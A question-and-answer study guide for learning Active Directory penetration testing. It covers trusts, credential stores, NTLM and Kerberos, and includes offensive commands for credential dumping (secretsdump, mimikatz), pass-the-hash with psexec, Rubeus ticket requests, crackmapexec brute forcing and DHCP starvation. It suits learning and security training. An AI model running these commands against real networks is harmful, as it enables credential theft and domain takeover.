S/O
All this documentation was made possible thanks to this Website that goes way deeper in everything listed below, I tried to make it shorter and question-based but for the technical guys here you can go and check out : https://zer1t0.gitlab.io/posts/attacking_ad/
Disclaimer:
English is not my native language, so there may be grammar mistakes in this document. Additionally, as I’m not a cybersecurity professional, there might be technical inaccuracies present. If you notice any mistakes or have suggestions for improvement, please don’t hesitate to reach out. I’m committed to promptly fixing any errors to enhance the quality of the document.
Game Plan, 4 week AD rush
Week 1: Understanding the Basics
- Milestone 1 (End of Week 1):
- Have a general understanding of the following sections:
- Domains
- Trusts
- Users
- Groups
- Computers
- Authentication
- Authorization
- Be able to explain the basic concepts of each section.
- Have a general understanding of the following sections:
Week 2: Deepening Knowledge
- Milestone 2 (End of Week 2):
- Have a detailed understanding of the following sections:
- Trust types
- Trust key
- User properties
- Important groups
- Windows computers connection
- NTLM
- ACLs
- Be able to describe the processes and mechanisms involved in each section.
- Have a detailed understanding of the following sections:
Week 3: Mastering Advanced Concepts
- Milestone 3 (End of Week 3):
- Have mastery over the following sections:
- Trust transitivity
- How to query the database?
- Kerberos
- Kerberos Delegation
- Powershell remoting
- SSH tunneling
- Be able to explain advanced concepts and apply them to specific scenarios.
- Have mastery over the following sections:
Week 4: Review and Consolidation
- Milestone 4 (End of Week 4):
- Review all articles and sections to consolidate knowledge.
- Practice exercises or simulations to test your understanding.
- Be capable of explaining each article in detail and answering specific questions on each topic.
What is an Active Directory?
- It’s a system that allows to manage a set of Computers & Users connected in the same network from a central server
Domain
What is a Domain?
- A domain is a set of computers connected to the same AD database that is managed by the same central server called Domain Controller
What is a Domain Name?
- every domain has a DNS name, it can be the same as their website (contoso.com) or and internal domain (contoso.local)
1 | #current user domain |
What is a NetBIOS name?
- It facilitates communication between computers on a local area network (LAN). Every domain can have it’s NetBIOS name. In the logs, you can identify users with
CONTOSO\Administrator
, where the first part is the NetBIOS name and the second one is the username.
What is a Forest?
- A forest is a tree of domains. The name of the forest is the name of the root domain (ex: contoso.com) and it has one or more subdomains:
1 | contoso.local |
- each domain has its own database and its own Domain Controllers. Users from a domain can access ressources in another domain but not in another forest
What are Functional Modes?
- A functional mode is the version of a domain/forest. The modes are named based on the minimum Windows Server operative system required to work with them. Then if, for example, you find a domain/forest with Windows2012 mode, you can know that all the Domain Controllers are at least Windows Server 2012.
1 | #Get the mode of the forest/domain |
Trust
What are Trusts?
- Trust is what links users and allow them to access to other domains in the same forest. A trust is a connection from a domain to another. Not a physical network connection, but a kind of authentication/authorization connection.
What is trust direction?
- A trust direction is a one sided trust that allows the trusted users to access the trusted domains resources
1 | (trusting) trusts (trusted) |
Difference between inbound and outbound connection:
- If the trust is directed towards your current domain, it’s an incoming (also called inbound) connection. If it goes from your domain to the other, it’s an outcoming (also called outbound) connection.
1 | #Trust of your current domain |
What is Trust transitivity?
- A trust can be transitive or nontransitive, a non-transitive trust indicates that the trust is not extended beyond the immediate relationship. In other words, just because entity A trusts entity B and entity B trusts entity C, it does not mean that entity A automatically trusts entity C whereas transitive trust means that trust is passed from one entity to another through a chain of trust relationships. Entity A trusts entity B, and entity B trusts entity C, then entity A also implicitly trusts entity C
transitive trust:
1 | (trusting) trusts (trusted) (trusting) trusts (trusted) |
- In a domain, to be able to access all the resources, you need all the parents and children to be connected by a bidirectional transitive trust:
1 | contoso.local |
What are the different Trust types?
- Parent-Child: The default trusts created between a parent domain and its child.
- Forest: A trust to share resources between forests. This way any domain of the forest can access to any domain on the other forest (if the direction and transitivity of the trust allow it). If a forest trust is misconfigured, then it can allow to take control of the other forest.
- External: A trust to connect to a specific domain that is in a non trusted forest.
- Realm: A special trust to connect Active Directory and a non-Windows domain.
- Shortcut: When two domains within the forest communicate often but are not directly connected, you can avoid jumping over many trusts by creating a direct shortcut trust.
Explain Trust Keys:
When you communicate through trust, there is a communication between the domain controller of your domain and the domain controller of the target domain and the domain controllers needs to share a key to keep the communications secure.
Users
Explain User Identifiers;
- User identifiers are what we use to distinguish users. it can be the username (stored in the SamAccountName attribute) or the SID (a combination of the domain SID plus the user RID (Relative Identifier), which is the last number that appears in the user SID)
What is User Secrets?
For the Domain Controller to be able to authenticate the user, the database stores the sensitive data but not in plaintext. The following secrets are saved:
- NT hash (and LM hash for the older accounts)
- The hashes are stored both in Windows local SAM and Active Directory NTDS databases
- Kerberos keys
you need administrator privileges (or equivalent) to dump the domain database with a dcsync attack or grabbing the
C:\Windows\NTDS\ntds.dit
file from the Domain Controller.- NT hash (and LM hash for the older accounts)
What can you do with those hashes?
LM hashes are not used a lot because often obsolete. NT hashes can be used to perform Pass-The-Hash or Overpass-the-Hash attacks in order to impersonate users in remote machines.
Additionally, you can try to crack the LM and NT hashes with hashcat to recover the original password. If you are lucky and the LM hash is present, this should be quickly.
What can you do with kerberos keys?
- The keys can be used to ask for a Kerberos ticket that represents the user in Kerberos authentication. It can be used in a Pass-The-Key attack to retrieve a ticket for the impersonated user.
What is UserAccountControl?
- It’s a proprety in the user class tha contains a series of flags that are very relevant for the security and the domain and used in many attacks (flags: https://learn.microsoft.com/en-us/troubleshoot/windows-server/active-directory/useraccountcontrol-manipulate-account-properties)
What are some Important Users and how to list them?
1 | net user /domain |
Administrator
user is the most privileged account of the domain,krbtgt
account is very important too. Its secrets (NT hash and Kerberos keys) are used to encrypt the tickets (specifically the TGTs) used by Kerberos that allows to authenticate users. If you are able to compromise thekrbtgt
account, you will be able of creating Golden Tickets.
What are Computer accounts and difference with user accounts?
- The difference between user accounts and computers accounts is that the firsts are stored as instances of User class in the database whereas the others are stored as instances of Computer class (which is a subclass of User class). Moreover the computer accounts names are the computer hostname finished with a dollar sign
$
.
1 | PS C:\> Get-ADObject -LDAPFilter "objectClass=User" -Properties SamAccountName | select SamAccountName |
What are Trust accounts?
- It’s good to know that you can have a normal user that finishes with a $, but when a trust is established, an associated user object is created in each domain to store the trust key. The name of the user is the NetBIOS name of the other domain, finished in $
- For example, in case of the trust between the domains FOO and BAR, the FOO domain would store the trust key in the BAR$ user, and the BAR domain would store it in the FOO$ user.
Groups
What are groups?
- Rather than managing each of the users file permissions, you put them in groups to handle the policy of all the users in a same group. the groups are stored in the domain database. And, in the same way, they can be identified by the
SamAccountName or the SID
1 | Get-ADGroup -Filter * | select SamAccountName |
Explain Administrative groups:
- There are many default groups defined for different roles in the domain/forest. As attacker, one of the most juicy groups is the Domain Admins group, that gives administrator privileges to its members in the domain
1 | Get-ADGroup "Domain Admins" -Properties members,memberof |
What are other interesting groups:
- The Enterprise Admins group, which provides administrator privileges in all the forest. It’s a group that only exists in the root domain of the forest, but is added by default to the Administrators group of the all the domains in the forest. There is also the the
Domain Admins
group that is added to theAdministrators
group of the domain, as well as theAdministrators
groups of the domain computers.
1 | .------------------------. |
- other important groups to be taken into account
What are different Group Scopes?
- There are 3 different groups based on their scope:
- Universal groups can include members from any domain within a forest or trusted forests and grant permissions within the same forest or trusted forests. The Enterprise Admins group is an example of a Universal group.
- Global groups can include members only from the same domain and grant permissions within domains of the same forest or trusting domains or forests. The Domain Admins group is an example of a Global group.
- DomainLocal groups can include members from the domain or any trusted domain and grant permissions only within their domains. The Administrators group is an example of a DomainLocal group.
Computers
Different types of Computers within a domain:
- Domain Controllers: The central servers that manage the domain. They are Windows Server machines.
- Workstations: The personal computers used by people every day. These machines are usually Windows 10 or 7 machines.
- Servers: The computers that offers services such as webs, files or databases. They are usually Linux or Windows Server machines.
What is a domain controller?
- The domain controller is the central server of a domain, that is running the Active Directory Domain Service (AD DS). It keeps the domain DB stored in ths ntds.dit file.
What is Domain database dumping?
- When we become domain admin, in order to read sensitive files like krbtgt user creds or create Golden tickets, we can dump the DB of the DC
- One way of doing this is dumping the NTDS.dit file locally with ntdsutil or vssadmin or remote with the impacket secretsdump.py script.
1 | secretsdump.py 'contoso.local/Administrator@192.168.100.2' -just-dc-user krbtgt |
How to discover Windows computers in a domain or network?
- (NetBIOS name service listens in the port 137) We can scan the network and perform a NetBIOS scan by using a tool like nbtscan or nmap nbtstat script.
- (SMB listens in the port 445) We can take advantage of the NTLM authentication negotiation to retrieve the machine name. You can perform an scan with ntlm-info or nmap smb-os-discovery script.
How to connect with RPC/SMB
- If you have port 445 open, you can use tools such as PsExec and the impacket examples psexec.py, wmiexec.py (wmiexec.py will also need the port 135)
- You can also perform Pass-the-hash with the NT or LM hash directly with impacket tools:
1 | psexec.py contoso.local/Anakin@192.168.100.10 -hashes :cdeae556dc28c24b5b7b14e9df5b6e21 |
- With the PsExec tool, inject the NT hash in the Windows session with mimikatz.
With those techniques we connect via NTLM auth, but by default Kerberos is used and we would need to provide a kerberos tickets with those tools
- in Windows we will need to inject the ticket in the session by using mimikatz or Rubeus.
Windows and linux use different ticket formay that we can convert using ticket_converter or cerbero.
How to use Powershell Remoting to connect
to connect to a Windows machine and get a Powershell session in the remote machine
- From windows we need to use CmdLets and parameters
1 | .\Rubeus.exe asktgt /user:Administrator /rc4:b73fdfe10e87b4ca5c0d957f81de6863 /ptt |
- From a Linux machine you can use evil-winrm.
How to connect with RDP
- From windows we can use mstsc
- From Linux we can use rdesktop, freerdp or remmina
- Unlike RPC/SMB, RDP transmits the password in plain text and allows the remote computer to cache the user’s credentials. it enables the user to log in to the remote system without having to enter their password again at each connection thus simulating the experience of being physically logged into their own machine. This makes it impossible to use pass-the-hash attacks
- But there is a mode called Restricted Admin, when enabled, you don’t send plain text so it’s then possible to perform pass the hash connections.
- From Linux, you can use freerdp to perform a Pass-The-Hash with RDP
- And from Windows you can inject a NT hash or Kerberos ticket with mimikatz or Rubeus and then use
mstsc.exe /restrictedadmin
Windows computers credentials
Explain LSASS credentials
- On windows machine -> common place to find creds -> LSASS Process (lsass.exe) in charge of user auth
- when user logs in -> credentials cached in lsass process in order to use SSO -> credentials caches by some SSPs (Security Support Providers) each one uses different auth methods, example:
- The Kerberos SSP
- The Digest SSP
- The NTLMSSP
- We can extract LSASS credentials using mimikatz. We can launch mimikatz directly in the target machine, or dumping the LSASS memory with some tool like procdump, comsvcs.dll or werfault.exe and then process the generated memory dump with mimikatz or pypikatz. can also to use lsassy to read a dump remotely avoiding to have to download the entire memory dump, that can take several megabytes.
Explain Registry credentials
- Other location to find credentials is the registry. One of the places where sensible credentials are stored is in the LSA secrets.
- In the LSA secrets you can find:
- Domain Computer Account: To be part of the domain, the computer must have a user account in the domain with available username and password. They are stored in the LSA secrets
- Service users passwords: If you want to run some services as the user, the computer needs to store the password but it does not store the user
- Auto-logon password: If windows auto-logon is enabled, the password can be stored in the LSA secrets. The other alternative is that it is saved in
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
registry key under the keyDefaulUserName
. - DPAPI master keys: The data protection API (DPAPI) is used to allow users encrypt sensible data without need to worry about cryptographic keys. If you are able to retrieve the master keys, then you can decrypt users data.
How to dump registry credentials:
To get the credentials from the SECURITY and SAM hives, we can read them from memory by using mimikatz.
execute token::elevate
to acquire a SYSTEM
session to read the credentials.
privilege::debug
if required to enable the SeDebugPrivilege.
other commands:
lsadump::secrets
: Get the LSA secrets.lsadump::cache
: Retrieve the cached domain logons.lsadump::sam
: Fetch the local account credentials.
We can also save a copy of the hive files with reg save command, move them to our machine, and finally to get the content with impacket secretsdump script or mimikatz.
Linux computers
How to discover linux machines on a network?:
Since Linux computers don’t have any characteristic port opened by default, however many Linux machines are used as servers that are remotely administrate. In order to administrate Linux computers, usually the SSH protocol is used. The SSH server service listens in the port 22
Moreover, older Linux machines may have Telnet enabled on port 23.
where to find linux computer credentials
Linux machines usually have a Kerberos client that is configured with the domain computer account. You can find the credentials in the keytab (/etc/krb5.keytab)
or specified in the Kerberos configuration file in /etc/krb5.conf.
You can use the keys stored to ask for a Kerberos ticket an impersonate the user.
What can you say about linux kerberos tickets?
- in order to be identified within the system, the linux machines has kerberos client configured within the computer account. You can find the creds usaully in the
/etc/krb5.keytab
OR/etc/krb.conf
file and you can display it usingklist
command - the next step would be to impersonate the user in the domain since, when authentificated, a kerberos ticket is retrieved under the
/tmp
directory in files with the formatkrb5cc_%{uid}
. it is also possible that tickets are stored in the Linux kernel keys instead of files, but you can grab them and convert to files by using tickey.
Where are stored the ssh private keys?
- usually they are stored in the .ssh directory in a file called
id_rsa
- In case the private key doesn’t require a passphrase for using it, then you may can use it to connect to another machines in the domain with this syntax:
1 | $ ssh -i id_ed25519_foo_key foo@db.contoso.local |
- a place worth looking is the bash history located in the
.bash_history
file of the user directory to find some credentials or command history
Services
What is the difference between active directory service and computer service?
A windows or linux machine service could be understood as a background process running like a task (ex: database) but it is not obliged for a service to be listening on a port:
it could simply be a service that for example checks for updates on the system
on the other hand, active directory services are identifieres that indicates what remote services are or can be available (listening on a port) on a machine. Not all the remote services are registered in the domain database, however, the registration is required for those services that need to authenticate domain users through Kerberos.
- each active directory service stores those informations:
- The user that runs the computer service.
- The service class, that indicates what kind of service is, for example web servers are registered like www class.
- The machine where the service is hosted.
Since all services dont require to be executed and are stored in AD database, it’s good to know that old services can lead to account takeover using kerberoast
Database
So we know the basics of the database of the domain and some objects stored in it like users, groups etc..
Can you go more in depth on classes and maybe subclasses?
We know that there is the User class, the Computer class or the Group class.
But a class can have a subclasse that allows to inherit propreties. For example, the Computer class is a subclass of User class, therefore the computer objects can have the same properties of the user objects ,like SAMAccountName
, and some new custom properties,
All the classes are subclasses of the Top class & many of the most relevant classes when performing a pentest, like User and Group, are attached to Security-Principal auxiliary class, the class that defines the SAMAccountName
and SID
properties.
What do you know about properties of a class?
Usually, properties are stored as a string value like name or something else. There are some properties that contain sensitive data that are marked as confidential properties
for example, the UserPassword and UnicodePwd propreties cannot be read, only written. When a password change is required, these properties can be written in order to modify the user password.
Only authorized users can retrieve the confidential properties.
There are some properties that require to meet certain conditions before being written.
Define principals in active directory?
In Active Directory, a principal is a security entity. The most common principals are users, groups and computers.
What are 3 kinds of SIDs in active directory?
Domain SID: used to identify the domain, as well as the base for SIDs of the domain principals.
Principal SID: used to identify principals. It is compose by the domain SID and a principal RID
Well-known SIDs that identify abstract entities for special situations. Some of them are:
- Authenticated Users
- Principal Self
- Administrator
- Domain Admins
What are Distinguished Names?
The distinguished name is like a path that indicates the object position in the database hierarchy
It’s used to identify objects in the db and reference objects (ex. the members of a group are referenced by its DistinguishedName
.
It’s composed by:
- Domain Component (DC) -> for
it.domain.com
the DC part will beDC=it,DC=domain,DC=com
. - Organizational Unit (OU)
- Common Name (CN) -> in
CN=Administrator,CN=Users,DC=contoso,DC=local
, theCN=Users
identifies the Users container.
What does the term Partitions refer to in AD databases?
The databases are divided by partitions:
- Domain: Stores the domain objects.
- Configuration: Stores configuration of the domain, such as the
HOST
service alias orWell-known
SIDs that we have seen before. - Schema: Stores the definition of the classes and properties used by the database.
- Domain DNS Zones: Stores the DNS records of the domain and subdomains.
- Forest DNS Zones: Stores the DNS records of the rest of the forest, including parent domains.
How would you define Global Catalog?
To speed up searches through objects in other domains, some domain controllers have a read-only partitions with a subset of objects of other domains. These Domains Controllers can be called Global Catalogs
Explain querying with LDAP & ADWS
To be able to interract with the domain controller database and it’s data, we wan use different protocoles/services ->
LDAP allows to filter objects, interact and edit them in the db via a query syntax and you can go more in depth and retrieve propreties from the objects you interract with like the name (can check out more on LDAP wiki). We can pretty much interract with anything that is not highly sensitive. When enumerating active directory, ldap is a go to, you can use ldapsearch and ldapmodify tools (on linux). since we can modify objects we could imagine adding a user.
On the other hand there is ADWS (Active Directory Web Services), it also manipulates domain objects but it’s based on SOAP messages. It works very well with LDAP and is compatible with LDAP filters. So much that when used, the DC internally uses LDAP reqs to retrieve results
Other protocols worth to know
- The DNS protocol
- The SAMR (Security Account Manager Remote) protocol
- The DRSR (Directory Replication Service Remote) protocol
- The Kerberos authentication protocol
- The Netlogon protocol
Security
the 3 main topics in the security realm of Active Directory are:
Address resolution; Authentication and Authentication
Address resolution
What are some dangers related to misconfigured address resolution?
The main danger is if a user or program can be tricked into connecting to an erroneous machine. Some common attacks are :
- Person-in-The-Middle (PitM) where the attacker interecpts the communication of the user and maybe interract with it if not encrypted
- NTLM Relay attack, using NTLM authentification from a victim and redirect it to a malicious server
- NTLM crack attack where the attacker just tries to crack the NTLM hash
What are the 3 types of addresses that need to be resolved?
MAC address -> unique identifier of each computer in the world. Sends messages via the ethernet protocol (can be altered with spoofing)
IP address -> used by the IP protocol on the internet layer. Allows communication via different computers in a same network (can read more about IP address attribution with DHCP or static IPs)
Hostnames -> Just like websites and DNS, Hostnames help us memorize and interract with computers with human-friendly names like computerOfFelix
rather than just an IP that is hard to remember
What are some vital processes for computers when it comes to finding the correct address to comunicate?
Hostname-IP resolution
- to map a hostname to it’s ip, computers can ask ask central server for hostname resolution which is used by DNS or they can send broadcast request asking all the computers to identify themselves (used by netBIOS, LLMNR, mDNS)
IP-MAC resolution
- Once we find an IP, we can broadcast to all to tell the network card of the computer to identify itself by asking for the MAC address related to the IP using the ARP protocol
IP configuration
- Either it’s done manually or dynamically using DHCP, we need to configure the IP of a computer. The danger if done dynamically is that the computer is not configured and asks blindly to the DHCP server using broadcast and can be tricked if an attacker has a fake DNS server
What is ARP?
ARP (Address Resolution Protocol) allows to map the relation between the IP address of a computer and its MAC (Media Access Control) address.
the client machine sends t broadcast ARP request to the local network, asking for the one that has the target IP address. Then the computer with that IP should respond identifying its MAC. Finally the client sends the application packets to that Ethernet address.
1 | .---. |
Explain ARP Spoofing
An attacker could try to respond to all ARP requests to impersonate other computers. To add a layer of security, rather than sending ARP requests every time they communicate, computers keep the old responses in their ARP cache to reduce the number of requests needed.
Explain how DHCP works
DHCP helps configure dynamic IP addresses to the computers of a network. When new to a network, the foreign computer will look for the DHCP server to get a config that allows them to interract with the network, it works in 4 steps:
-> Broadcast from the client to the server to find DHCP server
-> Server responds to request with valid IP
-> client receives IP and sends message to server to request it
-> Server confirms client can use the IP and config params like IP renewal time
1 | client server |
What is a Rogue DHCP server
A rogue DHCP server is a device on a network that, without permission, gives out IP addresses and network settings to devices, which can cause network problems and security risks. Therefore the perfect tool for an attacker could create a rogue DHCP server in order to set a custom configuration in the clients and redirect them to fake computers or domains controlled by the attacker
Explain DHCP Starvation attack:
It’s a DOS attack where a fake client requests all the available IPs the DHCP server has to offer and make it impossible for legitimate users to obtain an IP:
1 | $ dhcpstarv -i enp7s0 |
DNS
What is DNS?
DNS is a protocol that resolves DNS names of a computer to it’s address (port 53). (it can also be used with mapping an IP to its name or resolving the aliases for a name)
1 | client DNS server |
What are DNS zones?
DNS is hierarchical, each zone keeps record for it’s domain and the subdomains attached to it. Let’s take 2 zones for example:
Zone contoso.com
1 | contoso.com |
Zone internal.contoso.com
1 | internal.contoso.com |
Those are 2 independent zones, it makes it easier to keep track. The DNS server will comunicate with those zones in order to privide information to other zones
With the www.contoso.com
IP address, the DNS server needs to communicate with contoso authoritative DNS server, that manages the contoso.com zone, in order to retrieve this information.
Explain DNS exfiltration:
Let’s say we have a server that is isolated and has no internet access, but it can perform DNS queries. If the local DNS performs requests to other DNS servers on the internet, it can be abused: let’s say i have the DNS server malicious.com
, every query made to be or other subdomains will reach my server. An attacker could query a subdomain like felix.malicious.com
and technically, the query should go through the parent domain, thus, retrivieng informations. (attacker can use a tool like iodine or dnscat2)
How can DNS zone transfer be dangerous?
We know that zone transfer replicates all DNS server records. If misconfigured, anyone could perform zone transfers
If just one DC allows to perform the zone transfer whereas the rest of DCs refuse the zone transfer, the misconfigured DCcould lead to anyone being able to perform zone transfers, thus recolecting all the DNS information without require any credentials.
What to do if zone transfers aren’t allowed?
Since DNS records are stored in the AD database, we can read it using LDAP as any domain user to then dump all the DNS records, we can use adidnsdump to do so and it will save the output un records.csv file
What is ADIDNS?
ADIDNS Spoofing (thehacker.recipes)
ADIDNS is the Active Directory’s implementation of DNS. In this setup, the role of the DNS server is assumed by the Domain Controller (DC). This is because the Active Directory database contains the DNS names of the computers within the domain as well as other DNS records. This integration allows for seamless name resolution and management of DNS entries within the Active Directory environment.
What are DNS dynamic updates?
Dynamic updates allows clients to create/modify/delete DNS records. Since any user can create a DNS record, the user that created the record becomes the owner of this record, thus, only authorized users of a certain record can update of modify/delete the record
How Could be abuse Dynamic updates?
Exploiting ADIDNS (NetSPI Blog)
ADIDNS Revisited (NetSPI Blog)
Since DNS records are stored in the Active Directory database, they can be created/modify/deleted by using LDAP.
Registering a wildcard record (*) could be interesting since it’s used to specify a default IP address that is used to resolve those queries that doesn’t match any other record. It could lead to perform PitM attacks if it is used to point to a computer controlled by us.
What is NETBIOS?
NetBIOS (Network Basic Input/Output System) helps applications in the same LAN (Local Area Network) communicate between them. Howerever it was not able to communicate them on different networks so this led to the creation of NBT protocol (NetBIOS over TCP/IP) to make NetBIOS work over TCP and UDP protocols and allow applications that used NetBIOS to communicate over internet.
What are the 3 services used by NETBIOS?
- NetBIOS Datagram Service -> used as transport layer for application protocols that requires a connectionless communication.
- NetBIOS Session Service -> used as transport for connected-oriented communications
- NetBIOS Name Service -> This one is very interesting for pentesting, it allows to:
- Resolve NetBIOS name to an IP address
- Known the status of a NetBIOS node
- Register/Release a NetBIOS name
What is the NBNS protocol and how does it work?
The NBNS was implemented as WINS (Windows Internet Name Service). In a network, each Windows computer has a WINS database that stores the available network resources, netbios and domain name.
So in order to resolve a NetBIOS name we can query using the WINS server or If this is not possible, then the query can be sent to the IP broadcast address, waiting for the answer from the target computer (but dangerous since anyone can respond, this is used by responder.py)
What is LLMNR?
LLMNR is a descentralized application protocol that allows to resolve hostnames in the same local network. A common vuln with LLMNR is it is used to resolve names in local link by sending A DNS querie that anyone could repond to, responder.py also abuses this feature
What is mDNS?
mDNS (multicast DNS) is a descentralized application protocol, similar to LLMNR that allows to resolve names in local networks
What is WPAD?
The WPAD (Web Proxy Auto-Discovery) is a protocol for browsers to get dynamically a file that indicates the proxies they should use.
What is the difference between those protocols?
While they all perform name resolution, the primary difference lies in their order of preference for resolving names:
- DNS (Domain Name System)
- mDNS (Multicast DNS)
- LLMNR (Link-Local Multicast Name Resolution)
- NBNS (NetBIOS Name Service)
Each protocol has a specific context and method for resolving names, which dictates its usage priority in network communications.
Authentication
In Active Directory there are two network authentication protocols available: NTLM and Kerberos.
Kerberos is the preferred option to auth domain users but only NTLM can be used to auth local computer users
What are Windows SSPs?
SSPs (Security Support Provider), are implemented as dynamic link libraries (DLLs) that are loaded into processes that require security services.
In an Active Directory environment, SSPs are crucial for:
- User Authentication: Ensuring that users can securely log in to the network and access resources based on their permissions.
- Service Authentication: Verifying the identity of services and applications to prevent unauthorized access and ensure secure communication.
- Secure Communication: Protecting data transmitted over the network through encryption and integrity checks.
- Interoperability: Supporting different protocols and ensuring compatibility across various systems and applications within the network.
Give me some names of different SSPs
- Kerberos SSP
- The Kerberos SSP (kerberos.dll) manages the Kerberos authentication.
- NTLM SSP
- The NTLMSSP (msv1_0.dll) manages NTLM authentication.
- Negotiate SSP
1 | Kerberos |
- Digest SSP
- The Digest (wdigest.dll) implements the Digest Access protocol. This is the SSP that caches the plaintext password in old operating systems that can be retrieved by mimikatz.
- Secure Channel SSP
- The Secure Channel (schannel.dll) provide encrypted communications.
- Cred SSP
What is SPNEGO?
SPNEGO, or Simple and Protected GSSAPI Negotiation Mechanism, is a standard protocol used for negotiating security mechanisms, it ensures that the most appropriate and secure authentication protocol is used for each connection. Its ability to seamlessly switch between protocols like Kerberos and NTLM
What is NTLM?
NTLM (NT LAN Manager) is an authentication protocol that can be used by Windows services in order to verify the identity of the client. It’s good to know that NTLM is not an isolated protocol that generates network traffic, but must be used embebed in an application protocol, such as SMB, LDAP or HTTP.
What are the 3 stages of NTLM connection?
NEGOTIATE, CHALLENGE and AUTHENTICATE.
1 | client server |
How does NTLM work more in detail?
- Firstly, the client sends a NEGOTIATE message to the server. It indicates security options, like the NTLM version to use.
- The server generates a challenge by calling the NTLM SSP, and sends it to the client within a CHALLENGE message. Also confirms the negotiated options and sends information about its computer name and version and domain name.
- The client receives the challenge and calculates a response by using the client key (NT hash). If it is required, it also creates a session key and encrypts it with a key, known as session base key, derivated from NT hash and sends the response and session key back to the server.
- Finally, the server verifies that the challenge response is correct and sends a session key
1 | client server |
What is the difference between NTLMv1 and NTLMv2?
In NTLMv1, the NTLM response (NTLMv1 hash) to the server challenge is calculated by using the NT hash to encrypt the server challenge with the DES algorithm. The session key is also encrypted with the NT hash directly.
However, in NTLMv2 more data is taken into to protect the integrity of the AUTHENTICATE message
NTLMv2 concatenates all the additional data and applies an HMAC to calculate the NTLM response, known as NTLMv2 hash.
How does NTLM interract in Active Directory?
It’s good to remember that the NT hash is stored in the Active Directory database, located in the Domain Controllers
in order to verify the AUTHENTICATE message for a domain account, the target machine will send a request to the DC asking it to verify the client response to the challenge. The DC verifies this response and returns the necessary information to the machine
1 | client server DC |
It can also be used for machines in other domains, it must ask to the DC to verify the AUTHENTICATE message, and the DC in turn must send the AUTHENTICATE message to the DC of the user account domain (by using a trust)
1 | client server DC DC |
How do we force NTLM authentication over Kerberos?
A way to force NTLM authentication over Kerberos is to connect to the target machine by using the IP address instead of the hostname, since Kerberos requires the hostname to identify the machine services.
For example the command dir \\dc01\C$
will use Kerberos to authenticate against the remote share while dir \\192.168.100.2\C$
will use NTLM.
How does NTLM brute-force work?
We now know that NTLM is used for authenticating, so we could use plenty of tools (hydra, nmap, cme, or Invoke-Bruteforce.ps1) to test for a working password:
1 | $ cme smb 192.168.100.10 -u elfelixio -p passwords.txt |
We also need to remember that in active directory, authentication works by verifying credentials with the DC so this can lead to account block and will lead to a lot of logs
How does pass the hash woks?
Since NTLM calculates the NTLM hash and the session key based on the NT hash, we can use this hash to athenticate and impersonate the user even without cleartext password
On a linux host we could use impacket that accepts the hashes as parameter:
1 | $ psexec.py contoso.local/Anakin@192.168.100.10 -hashes :cdeae556dc28c24b5b7b14e9df5b6e21 |
How do we extract the NT hashes?
To extract NT hashes from lsass you can use mimikatz sekurlsa::logonpasswords command, dump the lsass process with tools like procdump, sqldumper or others, and copy the dump to your local machine to read it with mimikatz, pypykatz or read the dump remotely with lsassy, extract the hashes from the local SAM database or the NTDS.dit database in Domain Controllers
How does NTLM Relay work?
NTLM Relay Explained (hackndo)
This attack consists in an attacker redirecting the NTLM authentication to a server of its interest to get an authenticated session (Person-in-The-Middle attack)
1 | client attacker server |
Even after getting authenticated, the attacker does not know the session key so if signing is negotiated between client and server, the attacker won’t be able to generate valid signatures for the application messages
How to crack NTLM hashes?
When trying to do Person-in-The-Middle attacks we could use Responder.py or Inveigh to try and grab the hash
Exemple Inveigh (GitBook)
You can find some examples here
Then we could crack the hash using hashcat and the mode 5600
Exemple Cracking (GitBook)
you can also find examples of hash cracking here
It’s good to know that NTLMv1 hashes are faster to crack than NTLMv2 hashes since they are created with weaker algorithms.
Kerberos
Whart are kerberos principal types?
A principal is a unique identity to which Kerberos can assign tickets. Principals typically represent users, services, or hosts within the Kerberos realm. There are three principal types that can be used to request for a service: NT-SRV-INST, NT-SRV-HST or NT-SRV-XHST
What is a ticket in kerberos?
Tickets are structures partially encrypted that contain:
- The target principal (usually a service) for which the ticket applies
- Information related to the client, such as the name and domain
- A key to establish secure channels between the client and the service
- Timestamps to determine the period in which the ticket is valid
What is the PAC in active directory?
The Privileged Attribute Certificate (PAC) is an extension to Kerberos service tickets that holds information about the user and their privileges. It is added by a domain controller in an Active Directory domain when the user authenticates.
What informations does the PAC contain?
The PAC includes informations about the client:
- domain name and SID
- The username and user RID
- The RIDs (GroupIds) of those domain groups to which the user belongs.
- other SIDs (ExtraSids) of non-domain groups, that can be applied for inter-domain authentications
And also several signatures used to verify the integrity of the PAC and ticket data:
- Server signature (created with the same key used to encrypt the ticket)
- KDC signature: A signature of the Server signature created with the KDC key. This could be used to check that the PAC was created by the KDC and prevent Silver ticket attacks, but is not checked.
- Ticket signature: A signature of the ticket content created with the KDC key. This signature was recently introduced to prevent the Bronze bit attack.
What is Privileged Attribute Certificate (PAC)? (Lepide Blog)
What are the 3 actors Kerberos uses to authenticate users against services
- The client, it’s the user that recieves the ticket and gains access to a service in the domain
- The service or Application server, that is the machine that offers the sevice a user wants to access
- The KDC (Key Distribution Center), the entity that has access to the databse required to authenticate users
What are the 2 types of tickets?
STs (Service tickets), that a client presents to a AP/service/principal in order to get access to it. The KDC issues the STs for clients that request for them.
We need to be aware that TGSs are not STs, according to rfc4120 the TGS refers to the service that provides the service tickets.
The other type of ticket is the TGT. In order to get a ST from the KDC, we need to present our TGT.
TGTs are encrypted with the key of the krbtgt
account of the domain, known as the KDC key. Therefore, if you can retrieve the key of the krbtgt
(stored in the domain database), you could create custom TGTs known as Golden tickets.
How are tickets issued?
What are some kerberos services related to kerberos on port 88 and 464
The DC listens Kerberos in the port 88/TCP and 88/UDP.
Another service called kpasswd can be found in the port 464/TCP and 464/UDP of the DCs that allows to change the password of the users in the domain
What happens to the Kerberos keys when you change your password?
By changing the password, the user changes the Kerberos keys used for encrypting the Kerberos messages and tickets.
Basic Attacks
Kerberos Attack Scenarios (Gist)
What are some Kerberos erros related to Brute Force?
- KDC_ERR_PREAUTH_FAILED: Incorrect password
- KDC_ERR_C_PRINCIPAL_UNKNOWN: Invalid username
- KDC_ERR_WRONG_REALM: Invalid domain
- KDC_ERR_CLIENT_REVOKED: Disabled/Blocked user
What are some tools used for kerberos bruteforce?
Rubeus brute, kerbrute (Go), kerbrute (Python) or cerbero
What is kerberoasting?
Most services are registered in machine accounts, which have auto-generated passwords of 120 characters that changes every month so cracking = impossible. But some services are assigned to regular user so the ST is encrypted with their personal password that is (normally) not 120 chars, so, far more crackable
The Kerberoast attack consist on requests STs for the services of regular user accounts and try to crack them to get the user passwords. Usually, the users that have services also have privileges, so these are juicy accounts.
